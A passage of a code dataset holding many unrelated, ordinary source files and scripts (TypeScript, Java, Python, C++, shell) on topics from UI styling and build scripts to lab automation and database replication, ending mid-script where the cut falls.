text stringlengths 1 1.05M |
|---|
// Barrel file: re-exports every table-cell component so consumers can
// import them from this directory's index instead of individual files.
export { default as AnchorCell } from './AnchorCell';
export { default as ButtonCell } from './ButtonCell';
export { default as CheckboxCell } from './CheckboxCell';
export { default as LinkCell } from './LinkCell';
export { default as TableCell } from './TableCell';
|
/** Express-style route handler for GET /shipping-profiles/{id} (declaration only). */
declare const _default: (req: any, res: any) => Promise<void>;
/**
 * @oas [get] /shipping-profiles/{id}
 * operationId: "GetShippingProfilesProfile"
 * summary: "Retrieve a Shipping Profile"
 * description: "Retrieves a Shipping Profile."
 * x-authenticated: true
 * parameters:
 * - (path) id=* {string} The id of the Shipping Profile.
 * tags:
 * - Shipping Profile
 * responses:
 * 200:
 * description: OK
 * content:
 * application/json:
 * schema:
 * properties:
 * shipping_profile:
 * $ref: "#/components/schemas/shipping_profile"
 */
export default _default;
|
package ir.doorbash.update.downloader.broadcast;
import android.app.AlarmManager;
import android.app.PendingIntent;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;
import ir.doorbash.update.downloader.service.UpdateService;
import ir.doorbash.update.downloader.util.LogUtil;
import ir.doorbash.update.downloader.util.lock.CheckPowerLock;
/**
* Created by <NAME> on 3/10/16.
*/
/**
 * Receives connectivity-change broadcasts and schedules the update service to
 * check for a new version ~2 seconds later (debouncing rapid network flaps
 * via AlarmManager rather than starting the service directly).
 */
public class ConnectivityChangeReceiver extends BroadcastReceiver {
    public static final String TAG = "ConnectivityChangeReceiver";

    @Override
    public void onReceive(Context context, Intent intent) {
        Log.d(LogUtil.TAG, "ConnectivityChangeReceiver.onReceive()");
        // Hold a wake lock so the device stays awake until the check runs.
        CheckPowerLock.acquire(context);
        Intent i = new Intent(context, UpdateService.class);
        i.putExtra("action", UpdateService.ACTION_CHECK_NEW_VERSION);
        AlarmManager mgr = (AlarmManager) context.getSystemService(Context.ALARM_SERVICE);
        // Fix: a mutability flag is mandatory when targeting Android 12+ (API 31);
        // the previous flags value of 0 throws IllegalArgumentException there.
        // FLAG_IMMUTABLE requires compileSdk >= 23 — confirm the build config.
        PendingIntent operation =
                PendingIntent.getService(context, 3242, i, PendingIntent.FLAG_IMMUTABLE);
        mgr.set(AlarmManager.RTC, System.currentTimeMillis() + 2000, operation);
    }
}
|
<gh_stars>1-10
import { Dimensions } from 'react-native';

// Window dimensions; every proportional size below is derived from these.
const h = Dimensions.get('window').height;
const w = Dimensions.get('window').width;

// Shared stylesheet for the reporting screen.
export default {
  // Camera preview fills the screen, content pinned to the bottom centre.
  preview: {
    flex: 1,
    justifyContent: 'flex-end',
    alignItems: 'center',
  },
  // Shutter button shown over the preview.
  capture: {
    flex: 0,
    backgroundColor: '#fff',
    borderRadius: 5,
    padding: 15,
    paddingHorizontal: 20,
    alignSelf: 'center',
    margin: 20,
  },
  container: {
    backgroundColor: '#B0DAE6',
  },
  mb10: {
    marginBottom: 10,
  },
  // Step indicator row, nudged upward to overlap the element above it.
  step: {
    top: -h * 0.027,
    alignItems: 'center',
    marginBottom: -18,
  },
  btns: {
    alignItems: 'center',
    marginBottom: 10,
    flex: 1,
    flexDirection: 'row',
  },
  itemBtn: {
    width: w * 0.32,
    height: w * 0.21,
    // marginHorizontal: w * 0.00005,
  },
  // Circular step badge.
  stepCircle: {
    marginHorizontal: w * 0.05,
    width: w * 0.09,
    height: w * 0.09,
    borderRadius: w * 0.045,
    backgroundColor: '#ED882B',
  },
  stepText: {
    fontSize: w * 0.045,
    color: '#fff',
    textAlign: 'center',
    padding: w * 0.012,
  },
  location: {
    backgroundColor: '#ffffff',
    padding: w * 0.012,
    borderRadius: w * 0.03,
    height: h * 0.06,
  },
  locationText: {
    fontSize: w * 0.03,
    color: '#5c5c5c',
    padding: w * 0.012,
  },
  addText: {
    fontSize: w * 0.03,
    color: '#3c3c3c',
    padding: w * 0.03,
  },
  reportText: {
    fontSize: 22,
    width: 350,
  },
  textArea: {
    fontSize: w * 0.03,
    width: w * 0.91,
    backgroundColor: 'white',
    margin: w * 0.02,
    marginVertical: h * 0.004,
    borderRadius: 12,
  },
  iconSize: {
    fontSize: 12,
    color: 'red',
  },
  // Bottom action bar.
  bottom: {
    margin: w * 0.005,
    // backgroundColor: '#d79a96',
    flexDirection: 'row',
    alignItems: 'flex-end',
    alignContent: 'space-around',
  },
  bottom1: {
    // alignItems: 'center',
    width: w * 0.65,
    marginBottom: 10,
  },
  // Raised emergency button with a drop shadow (elevation on Android).
  emergency: {
    width: w * 0.26,
    height: w * 0.13,
    backgroundColor: '#DED9D9',
    alignItems: 'center',
    justifyContent: 'center',
    shadowColor: '#000',
    shadowOffset: {
      width: 0,
      height: 4,
    },
    shadowOpacity: 0.30,
    shadowRadius: 4.65,
    elevation: 8,
  },
  priorityText: {
    fontSize: w * 0.03,
    color: '#000',
    padding: w * 0.02,
  },
};
|
<filename>src/SnippetCompiler.ts<gh_stars>1-10
import * as tsconfig from 'tsconfig'
import * as fsExtra from 'fs-extra'
import { TSError } from 'ts-node'
import { TypeScriptRunner } from './TypeScriptRunner'
import { PackageInfo } from './PackageInfo'
import { CodeBlockExtractor } from './CodeBlockExtractor'
import { LocalImportSubstituter } from './LocalImportSubstituter'
import { CodeWrapper } from './CodeWrapper'
/** A single fenced code snippet pulled from a documentation file. */
type CodeBlock = {
  readonly file: string
  readonly snippet: string
  /** The snippet after local-import substitution and wrapping, ready to compile. */
  readonly sanitisedCode: string
}

/** Outcome of compiling one snippet; `error` is present only on failure. */
export type SnippetCompilationResult = {
  readonly file: string
  readonly index: number
  readonly snippet: string
  readonly error?: TSError | Error
}
/**
 * Compiles TypeScript code blocks extracted from documentation files inside a
 * throw-away working directory, reporting per-snippet success or failure.
 */
export class SnippetCompiler {
  private readonly runner: TypeScriptRunner

  constructor (private readonly workingDirectory: string) {
    const configOptions = SnippetCompiler.loadTypeScriptConfig()
    this.runner = new TypeScriptRunner(this.workingDirectory, configOptions.config)
  }

  /**
   * Loads the host project's tsconfig and disables `noUnusedLocals`, since
   * documentation snippets often declare variables purely for illustration.
   * The return type is inferred from `tsconfig.loadSync` instead of `any`.
   */
  private static loadTypeScriptConfig () {
    const typeScriptConfig = tsconfig.loadSync(process.cwd())
    if (typeScriptConfig?.config?.compilerOptions) {
      typeScriptConfig.config.compilerOptions.noUnusedLocals = false
    }
    return typeScriptConfig
  }

  /**
   * Compiles every code block found in the given documentation files.
   * The working directory is cleaned before and after the run.
   *
   * @returns one result per snippet, in extraction order; compilation
   *          failures are reported via `error` rather than thrown.
   */
  async compileSnippets (documentationFiles: string[]): Promise<SnippetCompilationResult[]> {
    try {
      await this.cleanWorkingDirectory()
      await fsExtra.ensureDir(this.workingDirectory)
      const examples = await this.extractAllCodeBlocks(documentationFiles)
      // No redundant async/await wrapper: testCodeCompilation already returns a Promise.
      return await Promise.all(
        examples.map((example, index) => this.testCodeCompilation(example, index))
      )
    } finally {
      await this.cleanWorkingDirectory()
    }
  }

  private async cleanWorkingDirectory (): Promise<void> {
    await fsExtra.remove(this.workingDirectory)
  }

  /** Extracts the code blocks of every file, flattened into a single list. */
  private async extractAllCodeBlocks (documentationFiles: string[]): Promise<CodeBlock[]> {
    const packageDefn = await PackageInfo.read()
    const importSubstituter = new LocalImportSubstituter(packageDefn)
    const codeBlocks = await Promise.all(
      documentationFiles.map((file) => this.extractFileCodeBlocks(file, importSubstituter))
    )
    return codeBlocks.flat()
  }

  private async extractFileCodeBlocks (file: string, importSubstituter: LocalImportSubstituter): Promise<CodeBlock[]> {
    const blocks = await CodeBlockExtractor.extract(file)
    return blocks.map((block: string) => ({
      file,
      snippet: block,
      sanitisedCode: this.sanitiseCodeBlock(importSubstituter, block)
    }))
  }

  /** Rewrites imports of the package-under-test to local paths, then wraps the code. */
  private sanitiseCodeBlock (importSubstituter: LocalImportSubstituter, block: string): string {
    const localisedBlock = importSubstituter.substituteLocalPackageImports(block)
    return CodeWrapper.wrap(localisedBlock)
  }

  /** Runs one snippet, translating any thrown value into a result record. */
  private async testCodeCompilation (example: CodeBlock, index: number): Promise<SnippetCompilationResult> {
    try {
      await this.runner.run(example.sanitisedCode)
      return {
        snippet: example.snippet,
        file: example.file,
        index: index + 1
      }
    } catch (error) {
      // Normalise non-Error throwables so callers can rely on `error` being an Error.
      const wrappedError = error instanceof Error ? error : new Error(String(error))
      return {
        snippet: example.snippet,
        error: wrappedError,
        file: example.file,
        index: index + 1
      }
    }
  }
}
|
import random

# Draw one pseudo-random float from the half-open interval [0.0, 1.0).
randomNumber = random.random()

# Echo the sample to stdout.
print(randomNumber)
def sum_array(A, N=None):
    """Return the sum of the first N elements of A.

    Args:
        A: Sequence of numbers.
        N: Count of leading elements to sum. Defaults to len(A), so the
           whole sequence is summed when N is omitted (backward-compatible
           generalisation of the original two-argument form).

    Returns:
        The arithmetic sum; 0 when the selection is empty.
    """
    if N is None:
        N = len(A)
    # Built-in sum over a generator replaces the manual accumulator loop.
    return sum(A[i] for i in range(N))
<filename>open-sphere-base/core/src/main/java/net/opengis/cat/csw/_202/GetCapabilitiesType.java
//
// This file was generated by the JavaTM Architecture for XML Binding(JAXB) Reference Implementation, vJAXB 2.1.10 in JDK 6
// See <a href="http://java.sun.com/xml/jaxb">http://java.sun.com/xml/jaxb</a>
// Any modifications to this file will be lost upon recompilation of the source schema.
// Generated on: 2010.01.22 at 02:23:57 PM MST
//
package net.opengis.cat.csw._202;
import javax.xml.bind.annotation.XmlAccessType;
import javax.xml.bind.annotation.XmlAccessorType;
import javax.xml.bind.annotation.XmlAttribute;
import javax.xml.bind.annotation.XmlType;
/**
*
* Request for a description of service capabilities. See OGC 05-008
* for more information.
*
*
* <p>Java class for GetCapabilitiesType complex type.
*
* <p>The following schema fragment specifies the expected content contained within this class.
*
* <pre>
* <complexType name="GetCapabilitiesType">
* <complexContent>
* <extension base="{http://www.opengis.net/ows}GetCapabilitiesType">
* <attribute name="service" type="{http://www.opengis.net/ows}ServiceType" default="http://www.opengis.net/cat/csw" />
* </extension>
* </complexContent>
* </complexType>
* </pre>
*
*
*/
// NOTE(review): JAXB-generated class (see file header) — any edits here are
// lost when the schema is regenerated; change the schema/bindings instead.
@XmlAccessorType(XmlAccessType.FIELD)
@XmlType(name = "GetCapabilitiesType")
public class GetCapabilitiesType
    extends net.opengis.ows._100.GetCapabilitiesType
{

    // Service type identifier; null means the XML attribute was absent and
    // the schema default (the CSW service URI) applies — see getService().
    @XmlAttribute
    protected String service;

    /**
     * Gets the value of the service property.
     *
     * @return
     *     possible object is
     *     {@link String }
     *
     */
    public String getService() {
        if (service == null) {
            // Schema-declared default for the 'service' attribute.
            return "http://www.opengis.net/cat/csw";
        } else {
            return service;
        }
    }

    /**
     * Sets the value of the service property.
     *
     * @param value
     *     allowed object is
     *     {@link String }
     *
     */
    public void setService(String value) {
        this.service = value;
    }
}
|
#!/bin/bash
# Flutter release-build helper, run from two levels below the project root.
#   --clean : run `flutter clean` before building
#   --apk   : build a release APK (default: release AAB)
# NOTE: both checks read $1, so only one option is honoured per invocation.

# Fix: abort if the project root cannot be reached — previously a failed cd
# would silently run the build in the wrong directory.
cd ../../ || exit 1

if [ "$1" == "--clean" ]
then
    echo "Running clean..."
    flutter clean
else
    echo "Skipping clean..."
fi

if [ "$1" == "--apk" ]
then
    echo "Building APK..."
    flutter build apk --release
else
    echo "Building AAB..."
    flutter build appbundle --release
fi
#include <iterator>
#include <map>
#include <stdexcept>
#include <string>
// Element: an identified item with an integer priority.
class Element {
public:
    Element(const std::string& id, int priority) : id_(id), priority_(priority) {}
    const std::string& GetId() const { return id_; }
    int GetPriority() const { return priority_; }
private:
    std::string id_;
    int priority_;
};

// Priority queue keyed by element id, backed by a std::map.
// Fixes over the original:
//  * elements are stored by value — the raw `new`/`delete` ownership (and the
//    leak from the missing destructor) is gone;
//  * the insert/replace decision is a local, not the uninitialised member
//    `addEntry` that leaked state between calls.
class PriorityQueue {
public:
    // Insert `element`; if an element with the same id exists, keep whichever
    // has the higher priority (ties keep the existing element).
    void AddElement(const Element& element) {
        auto it = elements_.find(element.GetId());
        if (it == elements_.end()) {
            elements_.insert({element.GetId(), element});
        } else if (it->second.GetPriority() < element.GetPriority()) {
            it->second = element;
        }
    }

    // Remove and return the element with the highest priority.
    // Throws std::out_of_range when the queue is empty.
    Element RemoveHighestPriorityElement() {
        if (elements_.empty()) {
            throw std::out_of_range("Priority queue is empty");
        }
        // Linear scan: the map is ordered by id, not by priority.
        auto best = elements_.begin();
        for (auto iter = std::next(elements_.begin()); iter != elements_.end(); ++iter) {
            if (iter->second.GetPriority() > best->second.GetPriority()) {
                best = iter;
            }
        }
        Element highestPriorityElement = best->second;
        elements_.erase(best);
        return highestPriorityElement;
    }

private:
    std::map<std::string, Element> elements_;
};
#include <iostream>
#include <string>
#include <thread>
#include "mmv.hpp"
// Blocking console reader: translates key names typed on stdin into key codes
// and pushes them onto the emulator's IO queue until the IO layer shuts down.
// Unrecognised tokens are silently ignored.
void input_thread(MMV &mmv)
{
    while (mmv.io.is_alive()) {
        std::string token;
        std::cin>>token;
        // One comparison per supported key; KEY_* constants come from mmv.hpp.
        if (token == "KEY_CL") mmv.io.push_key(KEY_CL);
        if (token == "KEY_POS") mmv.io.push_key(KEY_POS);
        if (token == "KEY_MEM") mmv.io.push_key(KEY_MEM);
        if (token == "KEY_INFO") mmv.io.push_key(KEY_INFO);
        if (token == "KEY_LEV") mmv.io.push_key(KEY_LEV);
        if (token == "KEY_ENT") mmv.io.push_key(KEY_ENT);
        if (token == "KEY_RIGHT") mmv.io.push_key(KEY_RIGHT);
        if (token == "KEY_LEFT") mmv.io.push_key(KEY_LEFT);
        if (token == "KEY_A1") mmv.io.push_key(KEY_A1);
        if (token == "KEY_B2") mmv.io.push_key(KEY_B2);
        if (token == "KEY_C3") mmv.io.push_key(KEY_C3);
        if (token == "KEY_D4") mmv.io.push_key(KEY_D4);
        if (token == "KEY_E5") mmv.io.push_key(KEY_E5);
        if (token == "KEY_F6") mmv.io.push_key(KEY_F6);
        if (token == "KEY_G7") mmv.io.push_key(KEY_G7);
        if (token == "KEY_H8") mmv.io.push_key(KEY_H8);
    }
}
// Entry point: loads the Mephisto ROM, starts the console input thread,
// runs the emulator, and waits for the input thread on shutdown.
int main(int argc, const char *argv[])
{
    MMV mmv;
    // NOTE(review): the ROM path is hard-coded; argc/argv are unused.
    const char *rom_filename = "mephisto5.rom";
    if (!mmv.load(rom_filename)) {
        std::cout<<"failed to load file: "<<rom_filename<<std::endl;
        return 1;
    }
    // std::ref: the thread must share the live MMV instance, not a copy.
    std::thread inp_th(input_thread, std::ref(mmv));
    mmv.run();
    inp_th.join();
    return 0;
}
|
<filename>temp_old/ui.py
"""Use lamp_setup_app.py to calibrate all labware first
If you need to control gpios, first stop the robot server with systemctl stop opentrons-robot-server. Until you restart the server with systemctl start opentrons-robot-server, you will be unable to control the robot using the Opentrons app.
"""
def choose_protocol(protocols_dic):
    """Prompt the user to pick a protocol and import its module.

    Args:
        protocols_dic: Mapping of menu number -> human-readable protocol name.

    Returns:
        The imported protocol module for the chosen entry.

    Raises:
        ValueError: If the input is not a number, or not a known menu entry.
            (Previously a non-numeric input raised a bare int() ValueError and
            an unknown number silently returned None, crashing later.)
    """
    s = "Currently these protocols are available:\n"
    for k in protocols_dic.keys():
        s += "{}: {} \n".format(k, protocols_dic[k])
    s += "Please choose the protocols to run (e.g. 1) \n Other inputs will leads to error \n"
    raw_choice = input(s)
    try:
        to_do = int(raw_choice)
    except ValueError:
        raise ValueError("Protocol choice must be a number, got {!r}".format(raw_choice))
    if to_do == 1:
        import ams_protocols.saliva_to_dtt as prot
        return prot
    elif to_do == 2:
        import ams_protocols.sample_to_lamp_96well as prot
        return prot
    raise ValueError("Unknown protocol choice: {}".format(to_do))
def confirm_deckplan(deck_plan):
    """Display the populated slots of a deck plan and ask for confirmation.

    Args:
        deck_plan: Mapping of deck slot -> labware; None marks an empty slot.

    Returns:
        The raw string the user typed ('y' starts the run, 'e' exits).
    """
    s = "Check the deck plan:\n"
    for k in deck_plan.keys():
        v = deck_plan[k]
        # Idiom fix: identity comparison with None (was `v != None`).
        if v is not None:
            s += "{}: {} \n".format(k, v)
    s += "Please confirm the deck_plan \n Enter 'y' to start the run \n Enter 'e' to exit\n"
    to_run = input(s)
    return to_run
# --- Run configuration -------------------------------------------------------
# Sample layout for this run.
sample_info = {
    "samples": 48,
    "sample_per_column": 8,
    "replicates": 2,
    "total_batch": 1,
    "start_batch": 1,
}
# Liquid-handling parameters passed straight to the protocol's run().
transfer_param = {
    "samp_vol": 5,
    "air_vol": 0,
    "disp": 1,
    "asp_bottom": 0,
    "disp_bottom": 0,
    'mix': 0,
    "get_time": 1,
    'dry_run': False,
    "aspirate_rate": 7.6,
    "dispense_rate": 7.6,
    "tip_press_increment": 0.3,
    "tip_presses": 1,
}
protocols_dic = {
    1: "Saliva to DTT",
    2: "Sample to LAMP",
}

prot = choose_protocol(protocols_dic)
to_run = ""
while to_run != "y":
    deck_plan = prot.initialize_robot()
    to_run = confirm_deckplan(deck_plan)
    # Fix: `to_run in 'yY'` also matched the empty string ("" is a substring
    # of every string), so just pressing Enter started the run. Compare
    # against an explicit tuple instead.
    if to_run in ("y", "Y"):
        prot.run(**sample_info, **transfer_param)
        break
    elif to_run == 'e':
        print("Exited")
        break
# prot.run()
# print_available_protocols()
|
#!/usr/bin/env bash
# Fetch and unpack the EuRoC MAV dataset sequence V1_01_easy.
set -x
set -e

DLNAME=V1_01_easy

# Download the sequence archive from the ETH ASL dataset server.
wget "http://robotics.ethz.ch/~asl-datasets/ijrr_euroc_mav_dataset/vicon_room1/${DLNAME}/${DLNAME}.zip"

# Extract into a directory named after the sequence, then remove the archive
# and the macOS metadata folder it ships with.
unzip -d "${DLNAME}" "${DLNAME}.zip"
rm "${DLNAME}.zip"
rm -rf "${DLNAME}/__MACOSX"

# Drop group/other write permission on the extracted tree.
chmod -R go-w "${DLNAME}"
|
def mean(lst):
    """Arithmetic mean of a non-empty sequence of numbers."""
    total = sum(lst)
    count = len(lst)
    return total / count
def std_dev(lst):
    """Population standard deviation of a non-empty sequence of numbers."""
    # Average computed inline (same arithmetic the mean() helper performs).
    avg = sum(lst) / len(lst)
    squared_gaps = [(value - avg) ** 2 for value in lst]
    variance = sum(squared_gaps) / len(lst)
    return variance ** 0.5
# Driver Code
# Example: population statistics over a small integer sample.
lst = [5, 7, 10, 8, 6]
print("Mean: ", mean(lst))
print("Standard Deviation: ", std_dev(lst))
#!/bin/sh
# Launcher for the TOTP tool: resolves its own canonical path, locates the
# build output directory, and runs totp.js under the standalone Nashorn shell.
set -eu

# Canonicalise $0 via perl's Cwd::realpath (portable where realpath(1) isn't).
# NOTE(review): inside single quotes the backslash in `\$ARGV[0]` reaches perl
# literally, so perl evaluates a reference (\$ARGV[0]) rather than the scalar —
# possibly an escaping artifact of how this file was embedded; verify before
# changing.
thispath=`perl -MCwd=realpath -le'print(realpath(\$ARGV[0]))' -- "${0}"`

# Prefer a sibling directory named after the script (minus .sh); otherwise
# fall back to ./target next to the script.
if [ -d "${thispath%*.sh}" ]; then
    dir=${thispath%*.sh}
else
    dir=${thispath%/*}/target
fi

# Pull JAVA_HOME and friends from the build's generated config.
. "${dir}/config.inc.sh"

# Run totp.js in strict mode with the compiled classes + Maven dep classpath.
PATH="${JAVA_HOME}/bin:${PATH}" CLASSPATH="${dir}/classes:`cat "${dir}/mdep.classpath"`" \
exec java org.openjdk.nashorn.tools.Shell -strict "${thispath%/*}/totp.js" -- "$@"
|
module IntuitOAuth
  # Well-known Intuit OAuth/OpenID discovery and token-migration endpoints.
  class Config
    DISCOVERY_URL_SANDBOX = 'https://developer.intuit.com/.well-known/openid_sandbox_configuration/'
    DISCOVERY_URL_PROD = 'https://developer.intuit.com/.well-known/openid_configuration/'
    MIGRATION_URL_SANDBOX = 'https://developer-sandbox.api.intuit.com/v2/oauth2/tokens/migrate'
    MIGRATION_URL_PROD = 'https://developer.api.intuit.com/v2/oauth2/tokens/migrate'
  end

  # OAuth scope identifiers accepted by Intuit's authorization server.
  class Scopes
    ACCOUNTING = 'com.intuit.quickbooks.accounting'
    PAYMENTS = 'com.intuit.quickbooks.payment'
    OPENID = 'openid'
    PROFILE = 'profile'
    EMAIL = 'email'
    PHONE = 'phone'
    ADDRESS = 'address'
    # whitelisted BETA apps only
    PAYROLL = 'com.intuit.quickbooks.payroll'
    PAYROLL_TIMETRACKING = 'com.intuit.quickbooks.payroll.timetracking'
    PAYROLL_BENEFITS = 'com.intuit.quickbooks.payroll.benefits'
  end

  # Library version and the User-Agent string sent with every request.
  class Version
    VERSION = '0.0.1'
    USER_AGENT = "Intuit-OAuthClient-Ruby#{VERSION}-#{RUBY_PLATFORM}"
  end
end
|
import tweepy

# Replace the API_KEY and API_SECRET with your application's key and secret.
# NOTE(review): API_KEY / API_SECRET are not defined anywhere in this script,
# so running it unmodified raises NameError — they must be filled in first.
auth = tweepy.AppAuthHandler(API_KEY, API_SECRET)
# NOTE(review): `wait_on_rate_limit_notify` and `api.search` exist only in
# tweepy < 4.0 (4.x removed the former and renamed the latter to
# `search_tweets`) — confirm the pinned tweepy version before upgrading.
api = tweepy.API(auth, wait_on_rate_limit=True,
                 wait_on_rate_limit_notify=True)
# Replace the hashtag with your hashtag of interest.
hashtag = '#100DaysOfCode'
# Fetch the tweets (Cursor pages through results lazily).
tweets = tweepy.Cursor(api.search, q=hashtag, lang="en").items()
# Print out the tweets
for tweet in tweets:
    print(tweet.text)
#!/usr/bin/env bash
#
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
#
# Positional arguments supplied by the Ambari service wrapper.
export oozie_conf_dir=$1
export oozie_examples_dir=$2
export hadoop_conf_dir=$3
export QUEUE=$4

# getValueFromField <xml-file> <property-name>
# Prints the <value> of the named property from a Hadoop XML config file.
function getValueFromField {
xmllint $1 | grep "<name>$2</name>" -C 2 | grep '<value>' | cut -d ">" -f2 | cut -d "<" -f1
return $?
}

# Resolve cluster endpoints from the local Hadoop client configuration.
export JOBTRACKER=`getValueFromField ${hadoop_conf_dir}/yarn-site.xml yarn.resourcemanager.address`
export NAMENODE=`getValueFromField ${hadoop_conf_dir}/core-site.xml fs.defaultFS`

# Unpack the bundled examples and make them world-readable.
cd $oozie_examples_dir
/var/lib/ambari-agent/ambari-sudo.sh tar -zxf oozie-examples.tar.gz
/var/lib/ambari-agent/ambari-sudo.sh chmod -R o+rx examples
# Rewrite the stock localhost endpoints (several historical default ports are
# covered) with the discovered NameNode / ResourceManager addresses and queue.
/var/lib/ambari-agent/ambari-sudo.sh sed -i "s|nameNode=hdfs://localhost:8020|nameNode=$NAMENODE|g" examples/apps/map-reduce/job.properties
/var/lib/ambari-agent/ambari-sudo.sh sed -i "s|nameNode=hdfs://localhost:9000|nameNode=$NAMENODE|g" examples/apps/map-reduce/job.properties
/var/lib/ambari-agent/ambari-sudo.sh sed -i "s|jobTracker=localhost:8021|jobTracker=$JOBTRACKER|g" examples/apps/map-reduce/job.properties
/var/lib/ambari-agent/ambari-sudo.sh sed -i "s|jobTracker=localhost:9001|jobTracker=$JOBTRACKER|g" examples/apps/map-reduce/job.properties
/var/lib/ambari-agent/ambari-sudo.sh sed -i "s|jobTracker=localhost:8032|jobTracker=$JOBTRACKER|g" examples/apps/map-reduce/job.properties
/var/lib/ambari-agent/ambari-sudo.sh sed -i "s|queueName=default|queueName=$QUEUE|g" examples/apps/map-reduce/job.properties
/var/lib/ambari-agent/ambari-sudo.sh sed -i "s|oozie.wf.application.path=hdfs://localhost:9000|oozie.wf.application.path=$NAMENODE|g" examples/apps/map-reduce/job.properties
|
/**
 * Error subclass carrying a numeric response code alongside the message,
 * for callers that map failures onto protocol-style responses.
 */
class CustomError extends Error {
  /**
   * @param {string} message Human-readable description of the failure.
   * @param {number} responseCode Numeric code reported to callers (default 550).
   * @param {...*} parameters Forwarded to the base Error constructor.
   */
  constructor(
    message = 'An unknown error has occurred',
    responseCode = 550,
    ...parameters
  ) {
    super(...parameters);
    // Fix: captureStackTrace is a V8-only API; guard it so the class also
    // works on non-V8 runtimes (Firefox, Safari) instead of throwing.
    if (typeof Error.captureStackTrace === 'function') {
      Error.captureStackTrace(this, CustomError);
    }
    // Conventional for Error subclasses: report the subclass name (was 'Error').
    this.name = 'CustomError';
    this.message = message;
    this.responseCode = responseCode;
  }
}
module.exports = CustomError;
|
<reponame>zeeskhan1990/proto
// Base named colours shared by every palette.
// Fix: renamed module-local `basePallette` -> `basePalette` (typo); the
// identifier is not exported, so no external caller is affected.
const basePalette = {
  alert: '#d83b01',
  alertBackground: '#deecf9',
  black: '#000000',
  blackTranslucent40: 'rgba(0,0,0,.4)',
  blue: '#0078d7',
  blueDark: '#002050',
  blueLight: '#00bcf2',
  blueMid: '#00188f',
  error: '#a80000',
  errorBackground: '#fde7e9',
  green: '#107c10',
  greenDark: '#004b1c',
  greenLight: '#bad80a',
  info: '#107c10',
  infoBackground: '#f4f4f4',
  magenta: '#b4009e',
  magentaDark: '#5c005c',
  magentaLight: '#e3008c',
  orange: '#d83b01',
  orangeLight: '#ff8c00',
  orangeLighter: '#ea4300',
  purple: '#5c2d91',
  purpleDark: '#32145a',
  purpleLight: '#b4a0ff',
  red: '#e81123',
  redDark: '#a80000',
  success: '#107c10',
  successBackground: '#dff6dd',
  teal: '#008272',
  tealDark: '#004b50',
  tealLight: '#00b294',
  white: '#ffffff',
  whiteTranslucent40: 'rgba(255,255,255,.4)',
  yellow: '#ffb900',
  yellowLight: '#fff100'
}

// Default theme: base colours plus the theme ramp and neutral greys.
export const defaultPalette = {
  ...basePalette,
  themeDarker: '#004578',
  themeDark: '#005a9e',
  themeDarkAlt: '#106ebe',
  themePrimary: '#0078d7',
  themeSecondary: '#2b88d8',
  themeTertiary: '#71afe5',
  themeLight: '#c7e0f4',
  themeLighter: '#deecf9',
  themeLighterAlt: '#eff6fc',
  neutralDark: '#212121',
  neutralPrimary: '#333333',
  neutralSecondary: '#666666',
  neutralSecondaryAlt: '#767676',
  neutralTertiary: '#a6a6a6',
  neutralTertiaryAlt: '#c8c8c8',
  neutralQuaternary: '#d0d0d0',
  neutralQuaternaryAlt: '#dadada',
  neutralLight: '#eaeaea',
  neutralLighter: '#f4f4f4',
  neutralLighterAlt: '#f8f8f8'
}

// Azure variant: default theme with overridden primary/neutral colours.
export const azurePalette = {
  ...defaultPalette,
  themePrimary: '#71B1D1',
  neutralPrimary: '#343A41'
}
#! /bin/sh
# End-to-end Londiste/PgQ replication smoke test across four local databases:
# sets up a root + two branches + a leaf, replicates a table, applies DDL,
# and finally exercises change-provider and switchover.
. ../env.sh

mkdir -p log pid conf

# Stop any daemons left over from a previous run.
./zstop.sh

# Verbosity flag for pgqadm/londiste; the last assignment wins (-q = quiet).
v=
v=-v
v=-q

# cleardb <dbname>: drop all replication schemas and test tables.
cleardb() {
echo "Clearing database $1"
psql -q -d $1 -c '
set client_min_messages=warning;
drop schema if exists londiste cascade;
drop schema if exists pgq_ext cascade;
drop schema if exists pgq_node cascade;
drop schema if exists pgq cascade;
drop table if exists mytable;
drop table if exists footable;
drop sequence if exists footable_id_seq;
'
}

# run <cmd...>: echo the command, then execute it.
run() {
echo "$ $*"
"$@"
}

# msg <text...>: print a banner separating test phases.
msg() {
echo "##"
echo "## $*"
echo "##"
}

db_list="db1 db2 db3 db4"

echo " * create configs * "

# create ticker conf
for db in $db_list; do
cat > conf/ticker_$db.ini << EOF
[pgqadm]
job_name = ticker_$db
db = dbname=$db
logfile = log/%(job_name)s.log
pidfile = pid/%(job_name)s.pid
EOF
done

# londiste configs
for db in $db_list; do
cat > conf/londiste_$db.ini << EOF
[londiste]
job_name = londiste_$db
db = dbname=$db
queue_name = replika
logfile = log/%(job_name)s.log
pidfile = pid/%(job_name)s.pid
EOF
done

# Start from a clean slate in every database.
for db in $db_list; do
cleardb $db
done

echo "clean logs"
rm -f log/*.log

# From here on, any failure aborts the test.
set -e

msg "Basic config"
run cat conf/ticker_db1.ini
run cat conf/londiste_db1.ini

msg "Install PgQ and run ticker on each db"
for db in $db_list; do
run pgqadm $v conf/ticker_$db.ini install
done
for db in $db_list; do
run pgqadm $v -d conf/ticker_$db.ini ticker
done

msg "Install Londiste and initialize nodes"
# Topology: node1 (root) -> node2, node3 (branches); node2 -> node4 (leaf).
run londiste $v conf/londiste_db1.ini create-root node1 'dbname=db1'
run londiste $v conf/londiste_db2.ini create-branch node2 'dbname=db2' --provider='dbname=db1'
run londiste $v conf/londiste_db3.ini create-branch node3 'dbname=db3' --provider='dbname=db1'
run londiste $v conf/londiste_db4.ini create-leaf node4 'dbname=db4' --provider='dbname=db2'

msg "See topology"
run londiste $v conf/londiste_db4.ini status

msg "Run Londiste daemon for each node"
for db in $db_list; do
run londiste $v -d conf/londiste_$db.ini replay
done

msg "Create table on root node and fill couple of rows"
run psql -d db1 -c "create table mytable (id int4 primary key, data text)"
for n in 1 2 3 4; do
run psql -d db1 -c "insert into mytable values ($n, 'row$n')"
done

msg "Register table on root node"
run londiste $v conf/londiste_db1.ini add-table mytable

msg "Register table on other node with creation"
for db in db2 db3 db4; do
